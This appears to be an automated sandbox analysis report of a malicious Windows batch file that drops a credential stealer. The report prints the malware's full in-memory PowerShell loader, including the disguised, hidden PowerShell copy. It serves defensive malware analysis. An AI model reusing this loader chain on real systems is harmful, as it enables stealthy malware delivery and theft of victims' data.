Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005382000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehvnc-CR-SCR3-0110.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.00000000052EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004BD2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamestealer-CR-0110.exe@ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000005302000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2173518865.0000000004B71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2216051258.0000000008350000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFile-CR-0110-CMD2.exeD vs 849128312.cmd
Source: 849128312.cmd.Fjz, 00000007.00000002.2171542081.0000000002BEB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 849128312.cmd
Source: 849128312.cmd.Fjz.4.dr	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs 849128312.cmd

Yara signature match

Source: Process Memory Space: 849128312.cmd.Fjz PID: 6640, type: MEMORYSTR

Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.67118f8.11.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.849128312.cmd.Fjz.9270000.21.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.evad.winCMD@20/4@3/3

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\Desktop\849128312.cmd.Fjz

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1628:64:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:64:WilError_03

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s1xryabt.rdz.ps1

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\chcp.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

File read: C:\Users\user\Desktop\849128312.cmd

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\849128312.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 2268
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 1144
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\849128312.cmd.Fjz	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\849128312.cmd.Fjz C:\Users\user\Desktop\849128312.cmd.Fjz -WindowStyle hidden -command "$Kxrvrz = get-content 'C:\Users\user\Desktop\849128312.cmd' \| Select-Object -Last 1; $Rztxxaika = [System.Convert]::FromBase64String($Kxrvrz);$Jjvgcfjmzi = New-Object System.IO.MemoryStream( , $Rztxxaika );$Cheoysx = New-Object System.IO.MemoryStream;$Vrypedkztmk = New-Object System.IO.Compression.GzipStream $Jjvgcfjmzi, ([IO.Compression.CompressionMode]::Decompress);$Vrypedkztmk.CopyTo( $Cheoysx );$Vrypedkztmk.Close();$Jjvgcfjmzi.Close();[byte[]] $Rztxxaika = $Cheoysx.ToArray();[Array]::Reverse($Rztxxaika); $Nlmpmdzvlef = [System.AppDomain]::CurrentDomain.Load($Rztxxaika); $Hncpdnhhl = $Nlmpmdzvlef.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Hncpdnhhl.DeclaringType, $Hncpdnhhl.Name).DynamicInvoke() \| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe "C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe"	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\849128312.cmd.Fjz	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\stealer-CR-0110.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\849128312.cmd.Fjz

